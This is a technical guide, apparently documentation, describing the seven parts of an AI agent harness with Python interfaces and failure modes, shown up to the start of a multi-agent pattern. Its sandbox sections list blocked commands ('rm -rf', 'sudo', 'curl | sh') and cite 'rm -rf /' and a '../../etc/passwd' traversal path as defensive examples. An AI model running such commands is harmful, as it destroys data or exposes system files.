
Harness Architecture: Seven Components

The seven components of a complete AI agent harness — LLM, tools, memory, planning loop, sandbox, orchestration, state — with architecture diagrams and pattern implementations.

What Is a Harness?

A harness is the complete architectural system surrounding an LLM that manages the lifecycle of context—from intent capture through specification, compilation, execution, verification, and persistence.

In simple terms: Everything except the model.

Architecture Overview

                          ┌─────────────────────────────┐
                          │        User / Caller         │
                          └──────────────┬──────────────┘
                                         │ intent

┌────────────────────────────────────────────────────────────────────────────┐
│                      7. ORCHESTRATION LAYER                               │
│  ┌──────────────────────────────────────────────────────────────────────┐  │
│  │  Session lifecycle · Retry logic · Error recovery · Agent init      │  │
│  └──────────────────────┬───────────────────────────────┬──────────────┘  │
│                         │                               │                 │
│           ┌─────────────▼─────────────┐   ┌─────────────▼──────────────┐  │
│           │  4. PLANNING LOOP         │   │  3. MEMORY MANAGEMENT      │  │
│           │  ┌─────────────────────┐  │   │  ┌──────────────────────┐  │  │
│           │  │ Perceive → Reason → │  │   │  │ Short-term (session) │  │  │
│           │  │ Plan → Act → Observe│  │◄─►│  │ Working (task)       │  │  │
│           │  └──────────┬──────────┘  │   │  │ Long-term (project)  │  │  │
│           │             │             │   │  │ Auto-consolidation   │  │  │
│           └─────────────┼─────────────┘   │  └──────────────────────┘  │  │
│                         │ tool calls      └────────────────────────────┘  │
│           ┌─────────────▼─────────────┐                                   │
│           │  5. SANDBOXING &          │                                   │
│           │     VALIDATION            │                                   │
│           │  Permission checks        │                                   │
│           │  Input sanitization       │                                   │
│           │  Audit logging            │                                   │
│           └─────────────┬─────────────┘                                   │
│                         │ validated calls                                 │
│           ┌─────────────▼─────────────┐   ┌────────────────────────────┐  │
│           │  2. TOOL INTEGRATION      │   │  1. LLM / AI MODEL        │  │
│           │  File ops · Code exec     │   │  Reasoning engine          │  │
│           │  Web search · APIs        │◄─►│  SLM for loops (7B-13B)   │  │
│           │  Browser · Image gen      │   │  LLM for verify (70B+)    │  │
│           └─────────────┬─────────────┘   └────────────────────────────┘  │
│                         │ results                                         │
│           ┌─────────────▼─────────────┐                                   │
│           │  6. FILESYSTEM &          │                                   │
│           │     PERSISTENCE           │                                   │
│           │  Workspace · State files  │                                   │
│           │  Session history · Git    │                                   │
│           └───────────────────────────┘                                   │
└────────────────────────────────────────────────────────────────────────────┘

Data Flow

  1. User submits intent to the Orchestration Layer
  2. Orchestration initializes the session and loads Memory
  3. The Planning Loop receives the intent plus loaded context
  4. The loop calls the LLM for reasoning, receives a proposed action
  5. Proposed tool calls pass through Sandboxing & Validation
  6. Validated calls reach the Tool Integration Layer for execution
  7. Tool results flow back through the loop; the LLM observes outcomes
  8. State changes persist to the Filesystem & Persistence layer
  9. The loop repeats until the task is complete or max iterations hit
  10. Orchestration ends the session, triggers memory consolidation

Core Components: Seven Essential Pieces

A production harness consists of these seven components:

1. LLM/AI Model

The reasoning engine. Can be swapped:

  • Claude (Anthropic) — best reasoning, safe defaults
  • GPT-4 (OpenAI) — capable, multimodal
  • Llama 3 (Meta) — open-source, can run locally
  • Mistral (Mistral AI) — efficient 7B option
  • Phi-4 (Microsoft) — optimized for specific tasks

Consideration for harnesses: use an SLM (7B-13B) for agentic loops and an LLM (70B+) for verification steps.

Interface

from abc import ABC, abstractmethod
from dataclasses import dataclass

@dataclass
class Message:
    role: str          # "system", "user", "assistant", "tool"
    content: str
    tool_calls: list | None = None
    tool_call_id: str | None = None

@dataclass
class LLMResponse:
    content: str
    tool_calls: list
    usage: dict        # {"input_tokens": int, "output_tokens": int}
    stop_reason: str   # "end_turn", "tool_use", "max_tokens"

class LLMProvider(ABC):
    @abstractmethod
    async def complete(
        self,
        messages: list[Message],
        tools: list[dict],
        temperature: float = 0.0,
        max_tokens: int = 4096,
    ) -> LLMResponse:
        """Send messages to the model and get a response."""
        ...

    @abstractmethod
    def count_tokens(self, messages: list[Message]) -> int:
        """Count tokens for context budget management."""
        ...

Common Implementation Patterns

Multi-provider routing — Use a fast, cheap model for simple decisions (classify intent, extract parameters) and a powerful model for complex reasoning (planning, code generation, verification):

class HybridRouter:
    def __init__(self, fast: LLMProvider, powerful: LLMProvider):
        self.fast = fast
        self.powerful = powerful

    async def route(self, messages: list[Message], tools: list[dict]) -> LLMResponse:
        # Classify complexity with the fast model
        classification = await self.fast.complete(
            messages=[Message(role="user", content=f"Is this simple or complex? {messages[-1].content}")],
            tools=[],
        )
        if "simple" in classification.content.lower():
            return await self.fast.complete(messages, tools)
        return await self.powerful.complete(messages, tools)

Retry with fallback — If the primary provider is down, fall back to the secondary:

class FallbackProvider(LLMProvider):
    def __init__(self, primary: LLMProvider, fallback: LLMProvider):
        self.primary = primary
        self.fallback = fallback

    async def complete(self, messages, tools, **kwargs) -> LLMResponse:
        try:
            return await self.primary.complete(messages, tools, **kwargs)
        except (RateLimitError, ServiceUnavailableError):
            logger.warning("Primary LLM unavailable, falling back")
            return await self.fallback.complete(messages, tools, **kwargs)

What Happens When This Component Fails

  • Rate limit: Harness must implement exponential backoff. Without it, the entire loop stalls.
  • Context overflow: The model returns a truncated or incoherent response. The harness must trim older messages before retrying.
  • Model hallucination: The model invents tool names or malformed arguments. Sandboxing catches this, but the loop must handle the rejection gracefully (re-prompt with the error).
  • Provider outage: Without a fallback provider, the harness is completely dead. Always have a secondary.
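
The exponential backoff mentioned under the rate-limit failure can be sketched as a retry wrapper. `RateLimitError` here is a stand-in for the provider SDK's actual exception type:

```python
import asyncio
import random

class RateLimitError(Exception):
    """Stand-in for the provider SDK's rate-limit exception."""

async def with_backoff(call, max_retries: int = 5, base_delay: float = 1.0):
    """Retry an async callable with exponential backoff plus jitter."""
    for attempt in range(max_retries):
        try:
            return await call()
        except RateLimitError:
            if attempt == max_retries - 1:
                raise
            # base, 2x base, 4x base, ... with up to 2x jitter to avoid
            # synchronized retry storms across concurrent sessions
            await asyncio.sleep(base_delay * (2 ** attempt) * (1 + random.random()))
```

Typical use wraps the provider call: `await with_backoff(lambda: llm.complete(messages, tools))`.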

2. Tool Integration Layer

Connects model to external capabilities:

  • Web search (access to current information)
  • Code execution (run and test code)
  • File operations (read, write, create)
  • APIs (database, external services)
  • Image generation (create assets)
  • Browser automation (interact with web)

Critical: Each tool must have:

  • Clear input/output schema
  • Validation (prevent unsafe operations)
  • Error handling (graceful failures)
  • Logging (understand what happened)
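
The schema and validation requirements can be enforced before dispatch. A minimal hand-rolled checker against the tool's input_schema (a real harness might use the jsonschema library instead; this sketch handles only required keys and primitive types):

```python
def validate_arguments(arguments: dict, input_schema: dict) -> list[str]:
    """Check required keys and primitive types against a simplified JSON Schema.
    Returns a list of error strings; an empty list means valid."""
    errors = []
    props = input_schema.get("properties", {})
    for key in input_schema.get("required", []):
        if key not in arguments:
            errors.append(f"Missing required argument: {key}")
    type_map = {"string": str, "integer": int, "number": (int, float),
                "boolean": bool, "object": dict, "array": list}
    for key, value in arguments.items():
        if key not in props:
            errors.append(f"Unexpected argument: {key}")
            continue
        expected = type_map.get(props[key].get("type"))
        if expected and not isinstance(value, expected):
            errors.append(f"Wrong type for {key}: expected {props[key]['type']}")
    return errors
```

Returning error strings (rather than raising) lets the harness feed failures back to the model as a tool result so it can correct itself.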

Interface

from dataclasses import dataclass
from typing import Any

@dataclass
class ToolDefinition:
    name: str
    description: str
    input_schema: dict       # JSON Schema for parameters
    requires_approval: bool  # True for destructive operations

@dataclass
class ToolResult:
    tool_call_id: str
    output: str
    error: str | None = None
    is_error: bool = False

class Tool(ABC):
    @abstractmethod
    def definition(self) -> ToolDefinition:
        """Return the tool's schema for the LLM."""
        ...

    @abstractmethod
    async def execute(self, arguments: dict[str, Any]) -> ToolResult:
        """Execute the tool with validated arguments."""
        ...

Common Implementation Patterns

File-based tool registry — Each tool is a separate module discovered at startup:

import importlib
import os

class ToolRegistry:
    def __init__(self):
        self._tools: dict[str, Tool] = {}

    def discover(self, tools_dir: str) -> None:
        """Load all tool modules from a directory."""
        for filename in os.listdir(tools_dir):
            if filename.endswith(".py") and not filename.startswith("_"):
                module_name = filename[:-3]
                module = importlib.import_module(f"tools.{module_name}")
                tool_class = getattr(module, "TOOL_CLASS")
                tool = tool_class()
                self._tools[tool.definition().name] = tool

    def get(self, name: str) -> Tool | None:
        return self._tools.get(name)

    def all_definitions(self) -> list[ToolDefinition]:
        return [t.definition() for t in self._tools.values()]

Concrete tool example — A file-read tool with validation:

class ReadFileTool(Tool):
    ALLOWED_DIRS = ["/workspace", "/tmp"]

    def definition(self) -> ToolDefinition:
        return ToolDefinition(
            name="read_file",
            description="Read the contents of a file at the given path.",
            input_schema={
                "type": "object",
                "properties": {
                    "path": {"type": "string", "description": "Absolute file path"},
                },
                "required": ["path"],
            },
            requires_approval=False,
        )

    async def execute(self, arguments: dict) -> ToolResult:
        path = arguments["path"]
        # Validate path is within allowed directories
        if not any(path.startswith(d) for d in self.ALLOWED_DIRS):
            return ToolResult(
                tool_call_id="",
                output="",
                error=f"Access denied: {path} is outside allowed directories",
                is_error=True,
            )
        try:
            with open(path, "r") as f:
                content = f.read()
            return ToolResult(tool_call_id="", output=content)
        except FileNotFoundError:
            return ToolResult(tool_call_id="", output="", error=f"File not found: {path}", is_error=True)

What Happens When This Component Fails

  • Tool not found: The LLM requests a tool that does not exist. The registry returns an error message, and the loop re-prompts. Without this, the loop hangs or crashes.
  • Tool timeout: A code-execution tool runs forever. Always set timeouts (asyncio.wait_for with a deadline). Kill the subprocess after the timeout.
  • Tool returns garbage: The LLM cannot parse the result. Return structured output (JSON or clear text), never raw binary or unstructured dumps.
  • Tool side effects: A destructive tool (file write, API call) partially completes then fails. Implement idempotent operations where possible, and log the partial state so recovery is possible.

3. Memory Management System

Four-layer architecture:

  • Short-term: Conversation context (this session)
  • Working: Intermediate state during loops (one feature)
  • Long-term: Persistent learnings (project lifetime)
  • Auto-consolidation: Automatic cleanup between sessions

See 04_memory_systems.md for detailed patterns.

Interface

@dataclass
class MemoryEntry:
    key: str
    content: str
    layer: str         # "short_term", "working", "long_term"
    created_at: float
    expires_at: float | None = None
    token_count: int = 0

class MemoryManager(ABC):
    @abstractmethod
    async def load(self, layer: str) -> list[MemoryEntry]:
        """Load all entries from a memory layer."""
        ...

    @abstractmethod
    async def store(self, entry: MemoryEntry) -> None:
        """Store an entry in the appropriate layer."""
        ...

    @abstractmethod
    async def consolidate(self) -> None:
        """Run auto-dream: merge, deduplicate, trim expired entries."""
        ...

    @abstractmethod
    def token_budget(self, layer: str) -> int:
        """Return the max token budget for this layer."""
        ...

Common Implementation Patterns

File-backed memory with token budgets:

import os
import time

class FileMemoryManager(MemoryManager):
    BUDGETS = {
        "short_term": 50_000,   # Current conversation
        "working": 10_000,      # Current task scratchpad
        "long_term": 5_000,     # Loaded at startup from MEMORY.md
    }

    def __init__(self, workspace: str):
        self.workspace = workspace
        self._entries: dict[str, list[MemoryEntry]] = {
            "short_term": [],
            "working": [],
            "long_term": [],
        }

    async def load(self, layer: str) -> list[MemoryEntry]:
        if layer == "long_term":
            memory_file = os.path.join(self.workspace, "MEMORY.md")
            if os.path.exists(memory_file):
                with open(memory_file) as f:
                    content = f.read()
                self._entries["long_term"] = [
                    MemoryEntry(key="project_memory", content=content,
                                layer="long_term", created_at=time.time())
                ]
        return self._entries.get(layer, [])

    async def consolidate(self) -> None:
        """Merge overlapping entries, remove expired, enforce budgets."""
        for layer, budget in self.BUDGETS.items():
            entries = self._entries[layer]
            # Remove expired
            now = time.time()
            entries = [e for e in entries if e.expires_at is None or e.expires_at > now]
            # Trim to budget (keep most recent)
            total = sum(e.token_count for e in entries)
            while total > budget and entries:
                removed = entries.pop(0)
                total -= removed.token_count
            self._entries[layer] = entries

What Happens When This Component Fails

  • Memory grows unbounded: Without consolidation, the conversation history fills the context window. The LLM starts producing degraded output or the API returns a context-length error. This is the most common memory failure.
  • Stale memory loaded: Long-term memory contains outdated facts that contradict current state. The LLM makes wrong decisions based on old information. Consolidation must timestamp and expire entries.
  • Memory file corrupted: A crash during write leaves MEMORY.md in a partial state. Always write to a temp file then atomically rename.
  • Working memory not cleared: State from task A leaks into task B. Clear working memory at task boundaries.
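
The write-then-rename fix for corruption can be sketched as follows. This variant also fsyncs before the rename and uses os.replace, which atomically overwrites on both POSIX and Windows:

```python
import os
import tempfile

def atomic_write(path: str, content: str) -> None:
    """Write content to a temp file in the same directory, fsync, then
    atomically replace the target, so a crash never leaves a partial file."""
    dir_name = os.path.dirname(os.path.abspath(path))
    fd, tmp_path = tempfile.mkstemp(dir=dir_name, suffix=".tmp")
    try:
        with os.fdopen(fd, "w") as f:
            f.write(content)
            f.flush()
            os.fsync(f.fileno())  # force bytes to disk before the rename
        os.replace(tmp_path, path)  # atomic on POSIX and Windows
    except BaseException:
        os.unlink(tmp_path)
        raise
```

The temp file must live in the same directory as the target; rename is only atomic within a single filesystem.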

4. Planning Loop (Agentic Loop)

Standardized cycle that repeats until task completion:

  1. Perceive: Understand current state, user intent
  2. Reason: What should I do next?
  3. Plan: Decide on action(s)
  4. Act: Execute (call tools, write files)
  5. Observe: What happened? Did it work?

See 05_ai_agents.md for framework options (ReAct, ToT, etc.).

Interface

@dataclass
class LoopState:
    iteration: int
    max_iterations: int
    messages: list[Message]
    task_complete: bool = False
    error_count: int = 0

class AgentLoop(ABC):
    @abstractmethod
    async def run(self, initial_intent: str) -> str:
        """Run the full agentic loop until completion or max iterations."""
        ...

    @abstractmethod
    async def step(self, state: LoopState) -> LoopState:
        """Execute a single iteration of the loop."""
        ...

Common Implementation Patterns

ReAct loop with tool dispatch:

class ReActLoop(AgentLoop):
    def __init__(self, llm: LLMProvider, tools: ToolRegistry,
                 memory: MemoryManager, sandbox: Sandbox, max_iterations: int = 25):
        self.llm = llm
        self.tools = tools
        self.memory = memory
        self.sandbox = sandbox
        self.max_iterations = max_iterations

    async def run(self, initial_intent: str) -> str:
        state = LoopState(
            iteration=0,
            max_iterations=self.max_iterations,
            messages=[
                Message(role="system", content=self._build_system_prompt()),
                Message(role="user", content=initial_intent),
            ],
        )
        while not state.task_complete and state.iteration < state.max_iterations:
            state = await self.step(state)
            state.iteration += 1

        if not state.task_complete:
            logger.warning(f"Loop hit max iterations ({self.max_iterations})")
        self.messages = state.messages  # Expose transcript for session persistence
        return state.messages[-1].content

    async def step(self, state: LoopState) -> LoopState:
        # 1. Call LLM with current messages and available tools
        response = await self.llm.complete(
            messages=state.messages,
            tools=[asdict(t) for t in self.tools.all_definitions()],  # dataclasses.asdict
        )

        # 2. If LLM wants to use tools, execute them
        if response.tool_calls:
            state.messages.append(Message(
                role="assistant", content=response.content,
                tool_calls=response.tool_calls,
            ))
            for call in response.tool_calls:
                # Validate through sandbox
                if not self.sandbox.allow(call):
                    result = ToolResult(
                        tool_call_id=call["id"], output="",
                        error="Operation blocked by sandbox policy", is_error=True,
                    )
                else:
                    tool = self.tools.get(call["name"])
                    if tool is None:
                        # Hallucinated tool name — return an error result so
                        # the loop can re-prompt instead of crashing
                        result = ToolResult(
                            tool_call_id=call["id"], output="",
                            error=f"Unknown tool: {call['name']}", is_error=True,
                        )
                    else:
                        result = await tool.execute(call["arguments"])
                        result.tool_call_id = call["id"]
                state.messages.append(Message(
                    role="tool", content=result.output or result.error,
                    tool_call_id=result.tool_call_id,
                ))
        else:
            # No tool calls — LLM is done (or stuck)
            state.messages.append(Message(role="assistant", content=response.content))
            if response.stop_reason == "end_turn":
                state.task_complete = True

        return state

What Happens When This Component Fails

  • Infinite loop: The LLM keeps calling tools without making progress. The max-iteration guard is essential. Without it, you burn unlimited API credits.
  • Loop stuck on error: A tool returns an error, the LLM retries the same call identically. Implement a “same-call detector” that forces the LLM to try a different approach after 2-3 identical failures.
  • Context exhaustion mid-loop: The message history exceeds the context window. Implement sliding-window trimming: keep the system prompt, first user message, and last N messages; summarize the middle.
  • Planning paralysis: The LLM reasons extensively but never calls a tool. Set a “must act within 3 turns” rule in the system prompt.
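
The sliding-window trimming described above can be sketched as follows (the summarize-the-middle step is omitted and marked where it would go):

```python
def trim_messages(messages: list, keep_last: int = 20) -> list:
    """Sliding-window trim: keep the system prompt, the first user message,
    and the last `keep_last` messages. The dropped middle could be replaced
    by an LLM-written summary (omitted in this sketch)."""
    if len(messages) <= keep_last + 2:
        return messages
    head = messages[:2]           # system prompt + first user message
    tail = messages[-keep_last:]  # most recent context
    return head + tail
```

Run this before each LLM call whenever `count_tokens` reports the history approaching the context budget.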

5. Sandboxing & Validation

Safety and control:

  • Validates all tool calls before execution (prevent injection)
  • Prevents unsafe operations (file deletion, system calls)
  • Enforces permission boundaries (what tools can access)
  • Logs all actions for auditability and debugging

Interface

@dataclass
class SandboxPolicy:
    allowed_tools: set[str]
    allowed_paths: list[str]         # Filesystem paths the agent can access
    blocked_commands: list[str]      # Shell commands that are never allowed
    max_file_size_bytes: int         # Prevent writing huge files
    require_approval: set[str]       # Tools that need human confirmation
    network_allowed: bool            # Can tools make network requests?

class Sandbox:
    def __init__(self, policy: SandboxPolicy):
        self.policy = policy
        self._audit_log: list[dict] = []

    def allow(self, tool_call: dict) -> bool:
        """Check if a tool call is permitted under the current policy."""
        name = tool_call["name"]

        # Tool must exist in allowed set
        if name not in self.policy.allowed_tools:
            self._log("BLOCKED", name, "Tool not in allowed set")
            return False

        # Check path-based restrictions for file tools
        if "path" in tool_call.get("arguments", {}):
            path = tool_call["arguments"]["path"]
            if not any(path.startswith(p) for p in self.policy.allowed_paths):
                self._log("BLOCKED", name, f"Path {path} outside allowed dirs")
                return False

        # Check for blocked shell commands
        if name == "run_command":
            cmd = tool_call["arguments"].get("command", "")
            for blocked in self.policy.blocked_commands:
                if blocked in cmd:
                    self._log("BLOCKED", name, f"Command contains blocked: {blocked}")
                    return False

        self._log("ALLOWED", name, "Passed all checks")
        return True

    def _log(self, decision: str, tool: str, reason: str) -> None:
        self._audit_log.append({
            "timestamp": time.time(),
            "decision": decision,
            "tool": tool,
            "reason": reason,
        })

Common Implementation Patterns

Approval flow for destructive tools:

async def execute_with_approval(self, tool_call: dict, tool: Tool) -> ToolResult:
    defn = tool.definition()
    if defn.requires_approval:
        # In CLI: prompt the user; in API: send webhook
        approved = await self.request_human_approval(tool_call)
        if not approved:
            return ToolResult(
                tool_call_id=tool_call["id"], output="",
                error="User denied approval", is_error=True,
            )
    return await tool.execute(tool_call["arguments"])

What Happens When This Component Fails

  • No sandbox at all: The LLM can delete files, execute arbitrary shell commands, exfiltrate data. This is a security incident, not a bug.
  • Overly permissive policy: Allowing rm -rf / through a shell tool. Always maintain a blocklist of destructive commands.
  • Path traversal: The LLM sends ../../etc/passwd as a file path. Validate that resolved absolute paths (after symlink resolution) are within allowed directories.
  • Audit log lost: Without logs, you cannot debug what the agent did or prove compliance. Write audit logs to a separate file that the agent cannot modify.
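
The path-traversal mitigation can be sketched with symlink-aware resolution; os.path.realpath collapses `..` segments and follows symlinks before the comparison:

```python
import os

def is_path_allowed(path: str, allowed_dirs: list[str]) -> bool:
    """Resolve symlinks and '..' before comparing against allowed roots.
    A naive startswith() on the raw string is bypassable via traversal."""
    real = os.path.realpath(path)
    for root in allowed_dirs:
        real_root = os.path.realpath(root)
        # commonpath guards against prefix tricks like /workspace-evil
        if os.path.commonpath([real, real_root]) == real_root:
            return True
    return False
```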

6. Filesystem & Persistence

The foundational harness primitive:

  • Workspace: Project directory with structure (state, progress, sessions)
  • State files: Git commits, feature lists, progress tracking
  • Session history: Transcripts for auto-dream consolidation
  • Versioning: git enables rollback and history inspection
  • Multi-agent: Isolated workspaces for different agents

Interface

import json
import os
import subprocess
from dataclasses import asdict

class WorkspaceManager:
    def __init__(self, root: str):
        self.root = root
        self.state_dir = os.path.join(root, ".harness")
        self.sessions_dir = os.path.join(self.state_dir, "sessions")

    def initialize(self) -> None:
        """Create workspace structure if it doesn't exist."""
        os.makedirs(self.state_dir, exist_ok=True)
        os.makedirs(self.sessions_dir, exist_ok=True)
        # Initialize git if not already a repo
        if not os.path.exists(os.path.join(self.root, ".git")):
            subprocess.run(["git", "init"], cwd=self.root, check=True)

    def save_session(self, session_id: str, messages: list[Message]) -> str:
        """Persist session transcript for later consolidation."""
        path = os.path.join(self.sessions_dir, f"{session_id}.json")
        with open(path, "w") as f:
            json.dump([asdict(m) for m in messages], f, indent=2)
        return path

    def load_state(self, key: str) -> dict | None:
        """Load a state file (feature list, progress, etc.)."""
        path = os.path.join(self.state_dir, f"{key}.json")
        if os.path.exists(path):
            with open(path) as f:
                return json.load(f)
        return None

    def save_state(self, key: str, data: dict) -> None:
        """Atomically save state (write tmp then rename)."""
        path = os.path.join(self.state_dir, f"{key}.json")
        tmp_path = path + ".tmp"
        with open(tmp_path, "w") as f:
            json.dump(data, f, indent=2)
        os.replace(tmp_path, path)  # Atomic replace on POSIX and Windows

What Happens When This Component Fails

  • No atomic writes: A crash during save_state corrupts the file. The harness cannot resume. Always write-then-rename.
  • No git history: Without commits, there is no rollback. A bad agent action permanently damages the workspace.
  • Session transcripts lost: Auto-dream cannot consolidate. Long-term memory degrades over time. Persist sessions immediately after each loop iteration, not just at session end.
  • Disk full: Unbounded session transcripts fill the disk. Implement rotation (keep last N sessions, archive or delete older ones).

7. Orchestration Layer

Coordinates the entire system:

  • Agent initialization: Set up environment, load memory
  • Session lifecycle: Begin, run loops, end, persist
  • Handoffs: Between phases (planning → execution → verification)
  • Retry logic: Recover from transient failures
  • Error recovery: Graceful degradation, fallbacks

Interface

class Harness:
    """Top-level orchestrator that wires all components together."""

    def __init__(
        self,
        llm: LLMProvider,
        tools: ToolRegistry,
        memory: MemoryManager,
        sandbox: Sandbox,
        workspace: WorkspaceManager,
        max_iterations: int = 25,
    ):
        self.llm = llm
        self.tools = tools
        self.memory = memory
        self.sandbox = sandbox
        self.workspace = workspace
        self.loop = ReActLoop(llm, tools, memory, sandbox, max_iterations)

    async def run_session(self, user_intent: str) -> str:
        """Execute a complete session from intent to result."""
        session_id = str(uuid.uuid4())
        logger.info(f"Session {session_id} starting")

        try:
            # 1. Initialize workspace
            self.workspace.initialize()

            # 2. Load memory layers
            await self.memory.load("long_term")
            await self.memory.load("working")

            # 3. Run the agentic loop
            result = await self.loop.run(user_intent)

            # 4. Persist session
            self.workspace.save_session(session_id, self.loop.messages)

            # 5. Consolidate memory
            await self.memory.consolidate()

            logger.info(f"Session {session_id} completed successfully")
            return result

        except Exception as e:
            logger.error(f"Session {session_id} failed: {e}")
            # Save partial state for debugging
            self.workspace.save_state("last_error", {
                "session_id": session_id,
                "error": str(e),
                "timestamp": time.time(),
            })
            raise

What Happens When This Component Fails

  • No error boundaries: A tool exception bubbles up and kills the entire harness. Every component interaction must be wrapped in try/except at the orchestration level.
  • No session persistence on crash: If the harness crashes mid-session, all progress is lost. Persist state after every loop iteration, not just at the end.
  • Retry without backoff: Retrying a failed LLM call immediately triggers another rate limit. Always use exponential backoff.
  • No graceful shutdown: Ctrl+C kills the process mid-write, corrupting state files. Handle SIGINT/SIGTERM to flush state before exiting.
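
The graceful-shutdown mitigation can be sketched as a handler that converts SIGINT/SIGTERM into a flag checked between loop iterations (the flush callback is a placeholder for whatever state persistence the harness uses):

```python
import signal

class GracefulShutdown:
    """Turn SIGINT/SIGTERM into a flag the loop checks between iterations,
    so state is flushed at a safe point rather than mid-write."""
    def __init__(self, flush):
        self.requested = False
        self._flush = flush
        signal.signal(signal.SIGINT, self._handle)
        signal.signal(signal.SIGTERM, self._handle)

    def _handle(self, signum, frame):
        self.requested = True  # defer actual shutdown to the next checkpoint

    def checkpoint(self) -> bool:
        """Call between loop iterations; flushes and reports whether to stop."""
        if self.requested:
            self._flush()
            return True
        return False
```

Note that signal handlers can only be registered from the main thread; in a multi-threaded harness, register once at startup.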

Proven Harness Patterns

Pattern 1: Single-Agent Supervisor (Simplest)

┌──────────────────────────┐
│  User Intent             │
└────────┬─────────────────┘

┌──────────────────────────┐
│  Supervisor Agent        │
│  (Single LLM in loop)    │
└────────┬─────────────────┘

    ┌────┴─────────────┐
    ↓                  ↓
┌─────────┐      ┌──────────┐
│ Tools   │      │  Memory  │
└─────────┘      └──────────┘

┌──────────────────────────┐
│  Persistent State        │
│  (Files, git commits)    │
└──────────────────────────┘

Characteristics:

  • One model in a ReAct loop with tools, memory, verification
  • Harness manages: initialization, context injection, tool dispatch, state persistence
  • Works well for bounded, well-defined tasks

Use case: Claude Code, personal assistant agents, single-task workflows

Complete Working Example

import asyncio
import os

async def main():
    # --- Wire up all 7 components ---

    # 1. LLM
    llm = ClaudeProvider(
        api_key=os.environ["ANTHROPIC_API_KEY"],
        model="claude-sonnet-4",  # Note: model IDs include date suffixes that change with releases
    )

    # 2. Tools
    tools = ToolRegistry()
    tools.discover("./tools")  # Loads read_file, write_file, run_command, web_search

    # 3. Memory
    memory = FileMemoryManager(workspace="./project")

    # 4. Planning loop (created inside Harness)
    # 5. Sandbox
    sandbox = Sandbox(SandboxPolicy(
        allowed_tools={"read_file", "write_file", "run_command", "web_search"},
        allowed_paths=["./project", "/tmp"],
        blocked_commands=["rm -rf", "sudo", "curl | sh"],
        max_file_size_bytes=10 * 1024 * 1024,  # 10 MB
        require_approval={"run_command"},
        network_allowed=True,
    ))

    # 6. Workspace
    workspace = WorkspaceManager(root="./project")

    # 7. Orchestration
    harness = Harness(
        llm=llm, tools=tools, memory=memory,
        sandbox=sandbox, workspace=workspace,
        max_iterations=25,
    )

    # --- Run a session ---
    result = await harness.run_session(
        "Create a Python function that parses CSV files and returns summary statistics. "
        "Write tests. Commit when done."
    )
    print(result)

if __name__ == "__main__":
    asyncio.run(main())

Pattern 2: Initializer-Executor Split (Long-Running Tasks)

Session 1:
┌───────────────────────────────────┐
│ INITIALIZER PHASE (runs once)     │
│ - Set up durable environment      │
│ - Create feature list (JSON)      │
│ - Establish git repo              │
│ - Initialize progress file        │
└───────────────────────────────────┘

    Shared Environment (files)

Sessions 2-N:
┌───────────────────────────────────┐
│ EXECUTOR PHASE (repeated)         │
│ - Read shared environment         │
│ - Work on one feature at a time   │
│ - Self-verify via testing         │
│ - Commit with issue refs          │
│ - Update progress file            │
└───────────────────────────────────┘

Why split phases:

  • Initializer: Expensive setup once (creates structure, plans work)
  • Executor: Cheap, incremental work (make progress, commit, stop)
  • Shared memory: Environment files act as project state bridge across sessions

Characteristics:

  • Reduces context exhaustion (don’t replay setup each session)
  • Produces cleaner, testable code (one feature per commit)
  • Enables long-running projects (month+, agent keeps progressing)

Use case: Large feature implementation, refactoring, product development

Handoff Implementation

The key to this pattern is the shared state file that bridges sessions:

# --- Initializer Session ---

class InitializerHarness(Harness):
    """Runs once to plan work and create the shared environment."""

    SYSTEM_PROMPT = """You are a project initializer. Your job:
    1. Analyze the user's requirements
    2. Break them into discrete features (max 10)
    3. Create a feature_list.json with status tracking
    4. Set up the project structure (directories, configs)
    5. Initialize git with a first commit
    Do NOT implement any features. Only plan and structure."""

    async def run_session(self, user_intent: str) -> str:
        result = await super().run_session(user_intent)

        # Verify the handoff artifact exists
        feature_list = self.workspace.load_state("feature_list")
        if not feature_list:
            raise RuntimeError("Initializer failed to create feature_list.json")

        return result


# --- Executor Session ---

class ExecutorHarness(Harness):
    """Runs repeatedly, picking up the next incomplete feature each time."""

    SYSTEM_PROMPT = """You are a feature executor. Your job:
    1. Read feature_list.json — find the first feature with status "pending"
    2. Implement ONLY that one feature
    3. Write tests for it
    4. Run the tests — fix until they pass
    5. Commit with a descriptive message referencing the feature
    6. Update feature_list.json: set that feature's status to "complete"
    7. Stop. Do not start the next feature."""

    async def run_session(self, user_intent: str = "") -> str:
        # Load the feature list to find next work item
        feature_list = self.workspace.load_state("feature_list")
        if not feature_list:
            raise RuntimeError("No feature_list.json found. Run initializer first.")

        pending = [f for f in feature_list["features"] if f["status"] == "pending"]
        if not pending:
            return "All features complete!"

        next_feature = pending[0]
        intent = f"Implement feature: {next_feature['name']}\nDescription: {next_feature['description']}"

        return await super().run_session(intent)

The feature_list.json handoff file:

{
  "project": "csv-analyzer",
  "created": "2026-04-18T10:00:00Z",
  "features": [
    {
      "id": 1,
      "name": "CSV parser core",
      "description": "Parse CSV files with header detection and type inference",
      "status": "complete",
      "completed_at": "2026-04-18T10:15:00Z"
    },
    {
      "id": 2,
      "name": "Summary statistics",
      "description": "Calculate mean, median, mode, std dev for numeric columns",
      "status": "pending",
      "completed_at": null
    },
    {
      "id": 3,
      "name": "CLI interface",
      "description": "Command-line interface with argparse for file input and output format",
      "status": "pending",
      "completed_at": null
    }
  ]
}
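The executor's final step (update the status in feature_list.json) is where a crash can corrupt the handoff file. A minimal sketch of an atomic update, assuming the JSON layout above; the helper name `mark_feature_complete` is illustrative:

```python
import json
import os
import tempfile
from datetime import datetime, timezone

def mark_feature_complete(path: str, feature_id: int) -> None:
    """Set a feature's status to "complete" using an atomic write.

    Writing to a temp file in the same directory and renaming over the
    original means a crash mid-write leaves the old file intact.
    """
    with open(path) as f:
        data = json.load(f)

    for feature in data["features"]:
        if feature["id"] == feature_id:
            feature["status"] = "complete"
            feature["completed_at"] = datetime.now(timezone.utc).isoformat()

    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(path) or ".")
    with os.fdopen(fd, "w") as f:
        json.dump(data, f, indent=2)
    os.replace(tmp, path)  # atomic rename on POSIX and Windows
```

This is the same atomic-rename pattern the Production Architecture Checklist asks for under Component 6.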

Running the full lifecycle:

async def run_project(requirements: str):
    # Phase 1: Initialize (once)
    init_harness = InitializerHarness(llm=llm, tools=tools, ...)
    await init_harness.run_session(requirements)

    # Phase 2: Execute (repeated until done)
    while True:
        exec_harness = ExecutorHarness(llm=llm, tools=tools, ...)
        result = await exec_harness.run_session()
        if "All features complete" in result:
            break
        # Fresh harness each iteration = fresh context window

Pattern 3: Multi-Agent Coordinator (Specialized Teams)

                  User

          ┌─────────────────┐
          │  Coordinator    │
